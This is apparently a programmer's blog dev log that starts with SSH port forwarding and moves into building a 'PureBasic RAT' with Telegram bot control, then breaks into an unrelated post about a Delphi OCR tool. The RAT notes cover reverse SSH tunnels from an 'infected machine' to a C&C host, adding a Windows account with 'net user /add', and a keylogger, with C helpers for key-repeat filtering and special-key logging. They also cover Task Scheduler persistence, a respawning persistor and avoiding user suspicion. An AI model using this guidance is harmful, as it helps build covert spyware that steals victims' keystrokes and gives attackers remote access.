Another use case for local port forwarding is described at https://www.youtube.com/watch?v=AtuAdk4MwWw. Suppose you're at work and you'd like to remote desktop to your home computer, but your work network has a firewall that blocks remote desktop connections by targeting port 3389. Under normal circumstances, the remote desktop client at work would connect to port 3389 on your home computer and everything would work fine. But now the firewall blocks port 3389, making the remote desktop application useless. In theory, changing the port the remote desktop app uses on both your work and home computers could work, but it may not be practical, allowed or possible. What you could do, however, if your home computer had an SSH server running, is set up a local port forward on your work computer, using an SSH client to connect to your home computer's SSH server. For example, on your work computer:
-->ssh homePCusername@homePCipAddress -L 6565:localhost:3389
The part before -L:
This would make an SSH tunnel to your home computer.
Part after -L and including:
Forward local port 6565 to port 3389 on your home computer ('localhost' is from the POV of the SSH server)
You then point the remote desktop client on your work computer at localhost:6565. The remote desktop application running on your home computer sees the connection coming in at the right port, 3389, as it normally would. And voila! You're connected to your home computer through your remote desktop software, despite the firewall rule.
Another example:
-->ssh compB@compBipAddr -L 9595:www.yahoo.com:80
Running the above on computer A would connect to the SSH server running on computer B and forward all local traffic targeted at port 9595 to www.yahoo.com at port 80, from computer B. So, going to localhost:9595 in a browser running on computer A would connect to yahoo.com at port 80 (the standard HTTP port) from computer B.
So, local port forwarding can be represented as a secure tunnel from client (A) to server (B):
\
   \________________
A ->________________-> B
   /
/
REMOTE forwarding:
This describes it best: https://www.ssh.com/ssh/tunneling/example.
The following command on computer A(client):
-->ssh usernameOfComputerB@IPaddressOfComputerB -R 8080:localhost:80
'..allows anyone on the computer B(running SSH server) to connect to port 8080 of the computer B. The connection will then be tunneled back to the client computer A, and the client then makes a connection to port 80 on localhost. Any other host name or IP address could be used instead of localhost to specify the host to connect to..'
So, the picture looks more like:
                    /
    ________________/
A <-________________ <- B
                    \
                    \
i.e. funnels data from SSH server computer B to SSH client computer A. Any connection on port 8080 of computer B would be pushed through the tunnel to computer A. But here's the important part, the command to do so is issued by the client A, as is consistent with the fact that commands are always issued by the client.
So, if you've got a client and a server, and if you can connect from client to server(firewalls and routers often don't allow this if the server sits behind one), you can redirect data from the specified port of the server to the client.
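The easy thing to mix up between -L and -R is which machine listens and which machine makes the onward connection. Here is a small JavaScript helper that spells it out for the `port:host:hostport` form. "client" is the machine running `ssh` and "server" is the machine running the SSH server. The target host name is resolved on the `connectsFrom` machine, which is why "localhost" means B for -L and A for -R.

```javascript
// Who listens, who dials out, and where to, for an OpenSSH -L or -R forward.
function describeForward(flag, spec, client, server) {
  const [listenPort, host, hostPort] = spec.split(":");
  const target = `${host}:${hostPort}`;
  if (flag === "-L") {
    // Listener on the client; the SSH server opens the onward connection.
    return { listensOn: `${client}:${listenPort}`, connectsFrom: server, target };
  }
  if (flag === "-R") {
    // Listener on the server; the SSH client opens the onward connection.
    return { listensOn: `${server}:${listenPort}`, connectsFrom: client, target };
  }
  throw new Error(`unsupported flag ${flag}`);
}

console.log(describeForward("-R", "8080:localhost:80", "A", "B"));
// { listensOn: 'B:8080', connectsFrom: 'A', target: 'localhost:80' }
```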
Now, a nice application of remote forwarding. First, forget the above figure.
This is the more interesting forwarding mode. See, firewalls are usually set up to allow outgoing connections but to block incoming connections on most ports. So, say we're at our home computer and we need a shell into our work computer, which sits behind a firewall/router. We could install an SSH client on the work computer and, from there, establish a reverse SSH tunnel to our home computer. Of course, our home computer has to be reachable (not blocked by a firewall/router) and running an SSH server. From our work computer:
-->ssh usernameOfHome@IPofHome -R 8787:localhost:22
The part before -R:
Establishes connection from work computer to home computer.
The part after -R:
Forwards the home computer's port 8787 to port 22 (the SSH port) on the work computer (localhost, from the work computer's point of view).
So, any app on our home computer connecting to the local port 8787(local meaning home computer's) will be forwarded to the work computer at port 22. Now, if we also have an SSH server running on the work computer, we could directly SSH from our home computer to the work computer using the following command @ home computer:
-->ssh usernameOfWork@localhost -p 8787
The above command connects to the local port 8787 which is forwarded to the work computer's port 22 using username of the work computer. How neat is that?
So, now we have access from our home computer to our work computer which is behind a firewall/router through the SSH tunnel.
Note that 'localhost' in the first command(issued from work) refers to the work computer while in the second command(issued from home) refers to the home computer.
Now, going back to our PureBasic RAT, if we could set up a reverse shell (remote forwarding) from the infected computer to our C&C computer, we could bypass the firewall shielding the infected computer. For this, the infected computer would have to use an SSH client to remote-forward its port 22 as:
-->ssh usernameOfCnC@IPofCnC -R 8787:localhost:22
The CnC machine would need to be running an SSH server of course, and be reachable(not behind firewall/router). Then from the CnC machine, an SSH client could be used to get a shell back to the infected machine as:
-->ssh usernameOfInfected@localhost -p 8787
But of course this would mean running an SSH server in the infected machine which could be problematic. Setting up the server in windows could be a PITA. And there's the problem of getting the username and password of one of the user accounts in the infected machine. One could always do a "net user /add username password". But setting up the server looks daunting.
ALL of this is just to access the infected machine's files. SO, if files are all we're after, we could just set up a reverse SSH tunnel (from the infected machine, using an SSH client there, of course) to our CnC, but forward FTP's port 21 instead of port 22.
-->ssh usernameOfCnC@IPofCnC -R 8787:localhost:21
Do keep in mind that the above command would be run from the infected machine using an SSH client there.
And we could run a hidden FTP server on that port (21) in the infected machine.
Then from our CnC computer running the SSH server, an FTP client such as FileZilla could be configured to connect to localhost @ 8787.
I've tried the above using FileZilla Server and the FileZilla client. It does work, but only kinda. Turns out, FTP uses two channels: command and data. FTP uses port 21 for the command channel but a random port above 1024 for data transfer. Good resources about it on the internet (search "Plain FTP through SSH tunnel"):
https://arstechnica.com/civis/viewtopic.php?t=697519
https://www.ftpgetter.com/ftp-ssh-tunnel.php
https://superuser.com/questions/1243806/piggyback-ftp-over-ssh-tunnel
Basically, what we're trying to do is use FTP through the SSH tunnel. It doesn't work because FTP uses a random port for data transmission. The FTP connection does happen, and so do command transfers, but data transfer doesn't work.
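The failure becomes concrete once you look at a passive-mode reply, assuming the client uses passive mode. Per RFC 959, the server answers PASV with "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)". The client then opens a second TCP connection by itself to h1.h2.h3.h4 on port p1 × 256 + p2. Only port 21 was forwarded, so that connection bypasses the tunnel, and the advertised address is the FTP server's own, often private, address. In active mode the server connects back to the client instead, which is also outside the tunnel. Here is a JavaScript sketch of the reply parsing; the sample reply is made up.

```javascript
// Parses an FTP "227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)" reply.
function parsePasvReply(line) {
  const m = /\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)/.exec(line);
  if (!line.startsWith("227") || m === null) throw new Error(`not a PASV reply: ${line}`);
  const n = m.slice(1).map(Number);
  // The data port is split into a high byte p1 and a low byte p2.
  return { host: n.slice(0, 4).join("."), port: n[4] * 256 + n[5] };
}

console.log(parsePasvReply("227 Entering Passive Mode (192,168,1,5,195,80)."));
// { host: '192.168.1.5', port: 50000 }
```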
SFTP (the SSH File Transfer Protocol) requires an SSH server running on the infected machine and has nothing to do with regular FTP. So, that's no good.
All in all, FTP through SSH tunnel isn't going to work. Look at this complexity: https://docstore.mik.ua/orelly/networking_2ndEd/ssh/ch11_02.htm
In any case, if you're the attacker running SSH server, you'll need to be reachable. You probably sit behind a router, like most people do, so you're going to have to configure your router to forward ports to your local IP. That isn't the case with me. I can't even access the router, much less configure a port forward. Obviously the infected machine is going to have to be assumed to be unreachable due to a router of its own. Firewall is no issue and can easily be circumvented, router is the problem.
*I wonder how TeamViewer and AnyDesk and other remote desktop applications work even through routers.
*https://superuser.com/questions/661749/how-exactly-does-a-remote-program-like-team-viewer-work
https://www.quora.com/How-does-TeamViewer-work
Turns out, TeamViewer uses their server as a relay. No open ports required.
*Running an SSH server on an Android phone over the carrier's mobile data plan isn't possible either. Turns out, mobile service providers don't give users public IPs. Users are assigned private IPs behind NAT gateways operated by the mobile service providers, much the same way a device behind a router is assigned a private IP.
https://android.stackexchange.com/questions/208972/can-any-computer-connect-to-a-ssh-server-running-on-an-android-phone-connected-t
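A quick way to see this on a given connection is to check whether the address the phone reports falls in a non-public range. The relevant ranges are the RFC 1918 private blocks and 100.64.0.0/10, the shared address space RFC 6598 reserves for carrier-grade NAT. Whether a particular carrier uses either is an assumption to verify, not something the check proves. Here is a JavaScript sketch:

```javascript
// Dotted-quad IPv4 text to an unsigned 32-bit number.
function ipv4ToUint(ip) {
  const parts = ip.split(".").map(Number);
  if (parts.length !== 4 || parts.some((p) => !Number.isInteger(p) || p < 0 || p > 255)) {
    throw new Error(`not an IPv4 address: ${ip}`);
  }
  return ((parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]) >>> 0;
}

// True if ip lies inside base/prefixLen.
function inCidr(ip, base, prefixLen) {
  const mask = prefixLen === 0 ? 0 : (0xffffffff << (32 - prefixLen)) >>> 0;
  return ((ipv4ToUint(ip) & mask) >>> 0) === ((ipv4ToUint(base) & mask) >>> 0);
}

const NON_PUBLIC_RANGES = [
  ["10.0.0.0", 8, "private (RFC 1918)"],
  ["172.16.0.0", 12, "private (RFC 1918)"],
  ["192.168.0.0", 16, "private (RFC 1918)"],
  ["100.64.0.0", 10, "shared address space for carrier-grade NAT (RFC 6598)"],
];

function classifyIPv4(ip) {
  const hit = NON_PUBLIC_RANGES.find(([base, len]) => inCidr(ip, base, len));
  return hit ? hit[2] : "not in these ranges (possibly public)";
}
```

If the phone's own interface address lands in one of these ranges, nothing on the internet can connect to it directly. That matches the observation above.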
*I'm moving on to adding a keylogging feature to the RAT. I knew I had to use GetAsyncKeyState(), and all worked well until I had to check for the CAPS LOCK toggle. I just couldn't think of a way to do it reliably with GetAsyncKeyState(). So, I turned to my sKeyLogger, a program I made in VB6 back in 2015. I knew I hadn't used GetAsyncKeyState() for getting the keys there; I knew it was hook-based. But I was certain that I had used GetAsyncKeyState() to check the state of the non-character keys. However, I was wrong. Turns out I was using GetKeyState() for that. In fact, there was no sign of GetAsyncKeyState() anywhere in the keylogging module of the program. And it turns out GetKeyState() can be used for checking the toggle status of keys such as CAPS LOCK, NUM LOCK and the like. The MSDN documentation says as much. But what it also says is that the API is thread-specific, so I had been under the impression that it wouldn't work for system-wide key detection. Turns out I was wrong. I don't know whether I knew the significance of GetKeyState() back then, but the keylogger did function very well. GetKeyState() works perfectly for checking the toggle states of toggle keys. To be honest, I'm still not that sure why it works, because isn't it supposed to check the key state for just our process/thread? Why does it work system-wide? Check out https://www.codeproject.com/Messages/3410698/GetAsyncKeyState-and-GetKeyState-Solved.aspx. At first glance, the internet seems to have no clue about, nor interest in, this API, and Google searches seem to be drifting ever further away from anything close to the Windows API.
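The reason GetKeyState() answers the CAPS LOCK question is in its return value. It is a 16-bit SHORT whose high-order bit (0x8000) means "key is down" and whose low-order bit (0x0001) means "key is toggled". GetAsyncKeyState()'s low bit, by contrast, only means "pressed since the previous call", and its documentation warns not to rely on it. This JavaScript sketch decodes such a value as it would come back for, say, VK_CAPITAL (0x14). The sample values are illustrative.

```javascript
// Decodes a GetKeyState()-style SHORT. A set high bit makes the signed
// value negative, so reinterpret it as 16 unsigned bits first.
function decodeKeyState(state) {
  const bits = state & 0xffff;
  return {
    down: (bits & 0x8000) !== 0,    // key currently held
    toggled: (bits & 0x0001) !== 0, // toggle key (CAPS/NUM/SCROLL LOCK) is on
  };
}

console.log(decodeKeyState(1));    // { down: false, toggled: true }
console.log(decodeKeyState(-127)); // { down: true, toggled: true }
```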
*Man, not using the low-level keyboard hook does force you to deal with lots of pesky edge cases. Dealing with single character repetitions was easy. But multiple keys may be repeated as well. Had to make an array of all simultaneously pressed keys and check it on each iteration. Doing that was a headache from yesterday evening through the night. I dunno. My head just wasn't making sense of the same code I'd been staring at all day. It seems simple enough this morning (4th May, 2020). The multiple-character repetition frequency threshold has been successfully implemented. Things like this, real-time keypress events, can be really hard to debug and get working. The only thing you have to work with is a theory of how things must be happening: theorize how things are going and how they should be going, implement it in code and pray it works.
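A minimal C sketch of a per-key repeat threshold, assuming the keys are polled in a loop (e.g. with GetAsyncKeyState()) and a millisecond clock is available. Giving every virtual-key code its own slot is one way to handle several keys held at once. repeat_filter, filter_init(), filter_should_record() and repeat_in_ms are hypothetical names, with repeat_in_ms standing in for the repeatInMs variable.

```c
#include <stdbool.h>
#include <stdint.h>

#define KEY_COUNT 256

/* Hypothetical filter state: one slot per virtual-key code, so keys held
   at the same time are tracked independently. */
typedef struct {
    bool     held[KEY_COUNT];     /* key was down on the previous poll */
    uint32_t last_ms[KEY_COUNT];  /* time the key was last recorded    */
    uint32_t repeat_in_ms;        /* repeat threshold (cf. repeatInMs) */
} repeat_filter;

static void filter_init(repeat_filter *f, uint32_t repeat_in_ms)
{
    for (int k = 0; k < KEY_COUNT; k++) {
        f->held[k] = false;
        f->last_ms[k] = 0;
    }
    f->repeat_in_ms = repeat_in_ms;
}

/* Call once per poll for each key. Returns true when the key should be
   logged: on a fresh press, or when a held key has stayed down for at
   least repeat_in_ms since it was last logged. */
static bool filter_should_record(repeat_filter *f, uint8_t vk, bool down,
                                 uint32_t now_ms)
{
    if (!down) {
        f->held[vk] = false;      /* released: next press counts as fresh */
        return false;
    }
    if (!f->held[vk]) {           /* fresh press */
        f->held[vk] = true;
        f->last_ms[vk] = now_ms;
        return true;
    }
    if (now_ms - f->last_ms[vk] >= f->repeat_in_ms) {
        f->last_ms[vk] = now_ms;  /* held long enough to count as a repeat */
        return true;
    }
    return false;                 /* held, still inside the threshold */
}
```

Setting repeat_in_ms to UINT32_MAX effectively blocks consecutive repeats of a held key altogether.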
*When the whole thing is built, I'm often amazed at how on earth I made it. But everything starts simple and builds up in complexity and functionality. That, I've learned, is important to bear in mind lest you despair at the apparent erosion of your competence.
*Keys that are normally held down (long-pressed keys), such as the arrow keys, Ctrl, Alt and Shift, are a headache to capture. So, I won't record those.
*I realize the repeat threshold (the repeatInMs variable) can be made arbitrarily high. After all, the program does catch unique keypresses without fail. How many people press and hold literal text? We don't even need to record the repetition. The threshold could be eliminated altogether; consecutive repeats could just be blocked outright without much harm. Hmm...
*You know what, I think recording special keys such as Ctrl, Alt and the arrow keys is gonna be required to maintain keylog readability. Just gonna have to record one event for any run of them so they don't repeat.
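One way to get "one event per run" is edge triggering: log a special key only on the poll where it goes from up to down, so holding it yields a single readable label. A minimal C sketch assuming polled key states; the virtual-key values are the standard ones from WinUser.h, hard-coded so the sketch compiles anywhere, while the labels and the names special_key_label() and special_key_event() are hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Standard virtual-key codes (WinUser.h), renamed to avoid clashing with
   the real VK_* macros if windows.h is also included. */
enum {
    VK_SHIFT_CODE = 0x10, VK_CONTROL_CODE = 0x11, VK_MENU_CODE = 0x12,
    VK_LEFT_CODE = 0x25, VK_UP_CODE = 0x26, VK_RIGHT_CODE = 0x27,
    VK_DOWN_CODE = 0x28
};

/* Readable label for a special key, or NULL for any other key. */
static const char *special_key_label(uint8_t vk)
{
    switch (vk) {
    case VK_SHIFT_CODE:   return "[SHIFT]";
    case VK_CONTROL_CODE: return "[CTRL]";
    case VK_MENU_CODE:    return "[ALT]";
    case VK_LEFT_CODE:    return "[LEFT]";
    case VK_UP_CODE:      return "[UP]";
    case VK_RIGHT_CODE:   return "[RIGHT]";
    case VK_DOWN_CODE:    return "[DOWN]";
    default:              return NULL;
    }
}

/* Edge trigger: return the label only on the up-to-down transition,
   so a key held across many polls is logged once. */
static const char *special_key_event(uint8_t vk, bool was_down, bool is_down)
{
    if (is_down && !was_down)
        return special_key_label(vk);
    return NULL;
}
```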
*If a variable of an outer scope is to be used inside procedures, the variable must be declared Global in PureBasic (or listed with Shared inside each procedure that uses it).
*Starting from PureBasic 5.4, all programs are unicode i.e. strings used in purebasic program source will be unicode strings and each character will use 2 bytes.
https://www.purebasic.com/documentation/reference/unicode.html
https://www.purebasic.fr/english/viewtopic.php?f=14&t=60171
So, Windows API calls such as RegSetValueEx() will always resolve to RegSetValueExW(), and thus the 'cbData' parameter of the function should not be Len(string) but SizeOf(Character)*(Len(string)+1), i.e. 2*Len(string) plus 2 bytes for the terminating null, which MSDN requires cbData to include for REG_SZ data. Look up the SizeOf() compiler function in the PureBasic help file.
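A minimal C sketch of that byte count, assuming UTF-16 strings (two bytes per character, as in a Unicode PureBasic build or WCHAR on Windows). reg_sz_cb_data() and set_string_value() are hypothetical helpers; only RegSetValueExW() is the real API, and that part is guarded so the sketch also compiles off Windows.

```c
#include <stddef.h>
#include <stdint.h>

/* REG_SZ data is UTF-16 (2 bytes per code unit), and cbData must also
   count the terminating null character. */
static size_t reg_sz_cb_data(size_t len_in_chars)
{
    return (len_in_chars + 1) * sizeof(uint16_t);
}

#ifdef _WIN32
#include <windows.h>
#include <wchar.h>
/* Windows-only: write a REG_SZ value under an already-open key. */
static LONG set_string_value(HKEY key, const wchar_t *name,
                             const wchar_t *value)
{
    return RegSetValueExW(key, name, 0, REG_SZ, (const BYTE *)value,
                          (DWORD)reg_sz_cb_data(wcslen(value)));
}
#endif
```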
*An HKLM or HKCU \Run entry doesn't work if the exe file prompts UAC for admin rights. If it doesn't prompt, the exe runs at startup alright, but without admin rights. Makes perfect sense. https://superuser.com/questions/238200/windows-7-autostart-with-admin-rights Probably the same reason I used Task Scheduler in sKeyLogger, IIRC.
*For persistence, creating a service in Windows seems to be a PITA. So, skipping that. For startup (and some persistence), Task Scheduler will have to be used because our program will need admin rights (right now for BlockInput(), maybe more later) and autorun capability (obviously). Creating a task purely using the Windows API seems to require additional C++ header files (mstask.h and taskschd.h) https://docs.microsoft.com/en-us/windows/win32/api/_taskschd/ Apparently, those are not very widely used headers. So, no support in PureBasic. I could optionally see which libraries these use (taskschd.lib, it seems, from https://docs.microsoft.com/en-us/windows/win32/taskschd/weekly-trigger-example--c---), but I've guessed it's taskschd.dll in system32. The exports don't make sense to me though, probably because the Task Scheduler API is COM-based (ITaskService and friends) rather than a set of plain exported functions. Anyway, I forgo this attempt to create tasks using the API, since everyone seems to be content with just using the Task Scheduler command-line utility schtasks.exe or the nice wrapper class that .NET apparently provides. It appears there was a reason I too used the schtasks method in VB6 in sKeyLogger. SMH. Google "Task scheduler commandline parameters": https://www.windowscentral.com/how-create-task-using-task-scheduler-command-prompt https://superuser.com/questions/299274/creating-scheduled-tasks-from-command-line-using-parameters or run "schtasks /create /?" at a command prompt.
*Admin rights are required to delete a scheduled task but not to create one (except if you're creating a task with the HIGHEST run level, i.e. the /rl HIGHEST switch).
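A sketch of building the schtasks.exe command line in C. The /create, /tn, /tr, /sc, /rl and /f switches are standard schtasks options; the ONLOGON trigger and the helper name build_schtasks_cmd() are assumptions for illustration, and whether a given trigger needs elevation on the target machine is worth checking there. The escaped inner quotes keep exe paths containing spaces intact.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: writes an schtasks.exe command line that runs
   exe_path at user logon. /rl highest is added only when highest is
   non-zero (creating such a task needs admin rights), and /f overwrites
   an existing task of the same name. Returns 0 on success, -1 if an
   argument contains a double quote or the buffer is too small. */
static int build_schtasks_cmd(char *buf, size_t size, const char *task_name,
                              const char *exe_path, int highest)
{
    /* A double quote inside either argument would break the quoting. */
    if (strchr(task_name, '"') != NULL || strchr(exe_path, '"') != NULL)
        return -1;

    int n = snprintf(buf, size,
                     "schtasks /create /tn \"%s\" /tr \"\\\"%s\\\"\" /sc onlogon%s /f",
                     task_name, exe_path, highest ? " /rl highest" : "");
    return (n < 0 || (size_t)n >= size) ? -1 : 0;
}
```

The resulting string can then be run the same way as any other command, e.g. with RunProgram() in PureBasic or CreateProcess() in C.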
*The DataSection and IncludeBinary functionality of the PureBasic compiler is so handy. Wish all languages had this.
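*While debugging the stub code in the PureBasic IDE, unlike VB6, you can't just put the %stub-projectname%.exe file into the source folder and go on with your debugging, because a program run from the IDE is compiled to a temporary executable elsewhere, so ProgramFilename() won't point at your project folder. Instead, use the handy CompilerIf directive to point to the correct executable, like so: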
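Define currpath.s = ProgramFilename() ; path of the running executable
CompilerIf #PB_Compiler_Debugger
    ; only compiled in when the debugger is enabled: point at the real exe
    currpath = "C:\Users\s0ft\Desktop\PurebasicRAT\Client\server.exe"
CompilerEndIf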
As you may have guessed, currpath is set to the right executable path only when compiling with the debugger.
*Updating resources in exe files doesn't seem to be very well documented on MSDN. Just check out the documentation on the UpdateResource() API.
*Apparently, LoadLibrary() is also used to obtain a handle to an exe file for use with FindResource() and LoadResource() (MSDN points to LoadLibraryEx() with the LOAD_LIBRARY_AS_DATAFILE flag when a module is loaded only to read its resources). Ref: https://www.codeproject.com/Articles/4945/UpdateResource ; https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya
*Writing and loading resources seems to be pretty easy/straightforward though, if you can explore around MSDN a bit.
*I've noticed with many Windows API functions that most of the time you're just jumping through unnecessary hoops, or rather the Windows API makes you. Most often it's probably a side effect of the Windows API's 'backward compatibility' virtue.
*So much of the Windows API documentation on MSDN seems neglected as of now. There's always some kind of bad link whenever I'm looking up some function there.
*Doing two BeginUpdateResource()->UpdateResource()->EndUpdateResource() sequences back to back results in unpredictable behavior of EndUpdateResource() the second time. Sometimes it succeeds and sometimes it fails with ERROR_OPEN_FAILED (error code 110). According to Hans Passant @ StackOverflow, "UpdateResource is quite troublesome..." ref: https://stackoverflow.com/questions/14378769/updateresource-no-error-but-resource-not-added-why . I carefully read the Remarks section of the MSDN documentation for EndUpdateResource() and found "Before you call this function, make sure all file handles other than the one returned by BeginUpdateResource are closed." It's probably got something to do with this. Not a lot of talk on this error regarding resource updates on the internet at this time. Googling "error_open_failed endupdateresource" brings up only a couple of results: https://github.com/dotnet/runtime/issues/3832
https://github.com/dotnet/runtime/issues/3831
The people there suspect an antivirus interfering with the API.
*WOW. They were right. It is the antivirus software interfering with the UpdateResource APIs. When I disable my ESET Smart Security's real-time protection, no errors! Consistently!
*Say you copy an exe file "trial.exe" from your Desktop folder to %tmp% and ShellExecute() it using the %tmp% path, all from another program "runner.exe" residing on your Desktop. The "trial.exe" program will inherit the working directory of "runner.exe", i.e. the Desktop, despite the fact that it's running from the %tmp% folder. This means if "trial.exe" creates any file without using absolute paths, the file will go to your Desktop folder! All this is if you don't specify the 'lpDirectory' parameter of ShellExecute(). To assign a working directory to the program being executed by this API, use the 'lpDirectory' parameter; in this case, it would have to be set to %tmp%. How had I not learnt of this until now? ref: http://forums.codeguru.com/showthread.php?283973-Shell-execute-a-program-but-change-it-s-working-directory
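A minimal C sketch of launching a copied exe with its own folder as the working directory. dir_of() and run_in_own_dir() are hypothetical helpers; ShellExecuteA() and its lpDirectory argument are the real API, guarded for Windows so the path handling can be tried anywhere.

```c
#include <stddef.h>
#include <string.h>

/* Copies the directory part of a path (everything before the last '\' or
   '/') into dir. Returns 0 on success, -1 if there is no separator or the
   buffer is too small. */
static int dir_of(const char *path, char *dir, size_t size)
{
    const char *sep = strrchr(path, '\\');
    const char *fwd = strrchr(path, '/');
    if (fwd != NULL && (sep == NULL || fwd > sep))
        sep = fwd;
    if (sep == NULL)
        return -1;                 /* bare file name, no directory part */
    size_t len = (size_t)(sep - path);
    if (len == 2 && path[1] == ':')
        len++;                     /* keep "C:\" rather than "C:" */
    if (len + 1 > size)
        return -1;
    memcpy(dir, path, len);
    dir[len] = '\0';
    return 0;
}

#ifdef _WIN32
#include <windows.h>
#include <shellapi.h>
/* Windows-only: run exe_path with its own folder as lpDirectory. */
static BOOL run_in_own_dir(const char *exe_path)
{
    char dir[MAX_PATH];
    if (dir_of(exe_path, dir, sizeof dir) != 0)
        return FALSE;
    HINSTANCE h = ShellExecuteA(NULL, "open", exe_path, NULL, dir,
                                SW_SHOWNORMAL);
    return (INT_PTR)h > 32;        /* values <= 32 indicate an error */
}
#endif
```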
*Apparently, there's no readily available free, authentic, trusted tool for Windows to force a system-wide HTTP/HTTPS redirect (system-wide proxy). At the time of this writing, there's Proxifier, which is a commercial program. There's also KKCap, which seems to be free but whose authenticity is questionable. A self-declared open-source alternative to Proxifier does exist on GitHub, but it doesn't work. And of course Fiddler doesn't capture processes that ignore the system's (Internet Explorer's) proxy settings. So, it appears there's no easy way to snoop on PureBasic RAT's traffic without reverse engineering its binary and stepping through the code (provided the bot API tokens are encrypted, of course). If Telegram had used plain HTTP instead of HTTPS, which would seem hilarious in this day and age, it would have been another story; any popular network monitor such as SmartSniff, Wireshark, tcpdump etc. would be able to see the data exchange in plain sight. ref:
https://stackoverflow.com/questions/33862969/system-proxy-settings-being-ignored-by-apps
https://stackoverflow.com/questions/34637396/how-to-force-a-specific-process-to-use-a-proxy-for-network-communication
https://www.comparitech.com/net-admin/decrypt-ssl-with-wireshark/
*Running an exe file from the Task Scheduler without explicitly specifying the working directory ("Start in" directory) leaves the exe's working directory set to system32 by default. Learnt this the hard way. I think it's best to either a) use absolute paths for file operations OR b) set the executable's folder as the working directory (PureBasic has SetCurrentDirectory() for just that) right at the beginning of the program. I'm using the second option.
https://stackoverflow.com/questions/33698946/how-to-change-start-directory-of-an-scheduled-task-with-schtasks-exe-in-windows
*The greatest asset of a programming language is its userbase.
*Apparently, PureBasic has a StringByteLength() function. How would I have known this before.
*A possible debug black hole: since there's no native boolean type in PureBasic, we use the integer type for a boolean variable. But if you do not specify this type for a variable explicitly, you won't be able to apply boolean logic to it. Example:
------------------------
Define someBool.i=#True
If someBool
    ;executed
EndIf
------------------------
Define someBool=#True
If someBool
    ;not executed
EndIf
------------------------
*This is the first time I've ever seen this happen: the server was running but didn't respond to my commands. I sent out /info and /screenshot but got nothing. I checked the Task Manager and the process was there, but it just didn't respond to the commands. I checked with Process Explorer: normally I would see the server process spawn conhost for the Task Scheduler persistence, but I didn't see that this time. There was no process activity. I suspected a hung network operation might be the culprit, so I unplugged my Ethernet cable and boom! The conhost spawns were back. As soon as I plugged the cable back in, I got the responses to the two pending commands in my Telegram chat with the bot. I am almost certain the HTTP functions in PureBasic don't time out properly, if at all. Gotta fix that. ref: http://forums.purebasic.com/english/viewtopic.php?f=3&t=72501
*Checking if a child process is running doesn't seem to be doable via CreateMutex(). So, I'm just gonna bank on the single-instance property of both the persistor and the server and spam RunProgram() at regular intervals for real-time persistence. But this approach seems to constantly change the cursor to busy, and obviously anyone would be suspicious. Just gonna use GetExitCodeProcess(). ref:
https://stackoverflow.com/questions/1591342/c-how-to-determine-if-a-windows-process-is-running
https://stackoverflow.com/questions/592256/fast-way-to-determine-if-a-pid-exists-on-windows
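A minimal C sketch of that GetExitCodeProcess() check, assuming the PID still belongs to the process that was started. GetExitCodeProcess() reports STILL_ACTIVE (259) for a running process; its MSDN remarks warn that a process which genuinely exits with 259 looks the same. process_looks_alive() and pid_is_running() are hypothetical names, and only the latter touches the real API, guarded for Windows.

```c
#include <stdbool.h>
#include <stdint.h>

/* STILL_ACTIVE as defined in the Windows headers. */
#define STILL_ACTIVE_CODE 259u

/* Running only if the call succeeded and reported STILL_ACTIVE. A process
   that really exited with code 259 is misreported as running. */
static bool process_looks_alive(bool call_ok, uint32_t exit_code)
{
    return call_ok && exit_code == STILL_ACTIVE_CODE;
}

#ifdef _WIN32
#include <windows.h>
/* Windows-only: check a PID obtained earlier, e.g. from CreateProcess(). */
static bool pid_is_running(DWORD pid)
{
    HANDLE h = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
    if (h == NULL)
        return false;          /* no such process, or access denied */
    DWORD code = 0;
    BOOL ok = GetExitCodeProcess(h, &code);
    CloseHandle(h);
    return process_looks_alive(ok != FALSE, code);
}
#endif
```

PIDs can also be reused once a process exits, so this only answers "is some process with this PID alive", not "is it still my server".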
But alas! It doesn't work for monitoring the server process. This is because when the persistor executes the server executable from a random location, the server process installs itself to the right installation directory and then runs from there instead. Thus, the persistor is left with a stale Process ID that no longer corresponds to the server process. Most forms of Inter-Process Communication (IPC) require knowledge of the process, which in the aforementioned case is a luxury we won't have. Other, non-process-specific IPC would require some mechanism to store state and a good protocol to decide on a state change. So, I think creating a window and searching for its title, coupled with some kind of fail-safe, is the simpler and more effective way to go about this. That's probably how I used to do this in VB6.
*IPC in windows ref: https://www.drdobbs.com/windows/using-named-pipes-to-connect-a-gui-to-a/231903148
*https://app.diagrams.net/ for flowchart

Tuesday, April 21, 2020

Screen Text Finder

TL;DR
This is a program that lets you locate a search string on your screen. It performs OCR on a screenshot to achieve that. Download here. Be sure to have all the necessary .dll files and the eng.traineddata file in the same folder as the executable.

The long version:
This is a project I did to teach myself Delphi. The reason for that is, well, a lot of leisure time in the time of a pandemic. But the substance of the why is, I wanted to know the only other language that offers a RAD (Rapid Application Development) environment apart from my good old VB6 and the cool new kid on the block, C#. I could have done it in C#, but I wanted a native executable. The old concern of the user not having the .NET Framework installed is no longer there, since everyone's on Windows 10's bloat (pun intended), but C# being a VM-based language, I have noticed its binaries taking their time to load the first time they are executed. Anyway, I wanted to see if Delphi could be my next go-to language for quick and dirty apps, just as VB6 was in the good ole days around a decade ago. I had tried Delphi 7 back in the day (7-9 years ago), during the HackHound days, fun days. But it was nothing serious. I mostly used it for generating shellcodes and staring at other people's code (steve10120, counterstrikewi and others), hoping to implement my own version in the one language I knew back then - you guessed it, VB6. So, this time, I was determined to go through with it. This is why I chose Delphi. But then I had heard of another phenomenon in Pascal land: Lazarus.
Lazarus is an IDE based on the Free Pascal compiler that is supposed to be the free and open-source alternative to Delphi. I tried it. To the credit of Lazarus' developers, the installer is pretty light, the installation is pretty quick and the IDE is snappy to open. So are the compiled binaries. But coming from Visual Studio, any IDE was going to have a hard time impressing me. I used to use CodeSmart by AxTools with VB6. It is an IDE plugin that added code completion, IntelliSense and all that good stuff modern IDEs have by default. And it was pretty helpful. Once I got hold of it, I never coded in VB6 without it again. The point is, I've always done serious Windows desktop development with great IDEs. All this to say, I was not impressed with Lazarus, at all.
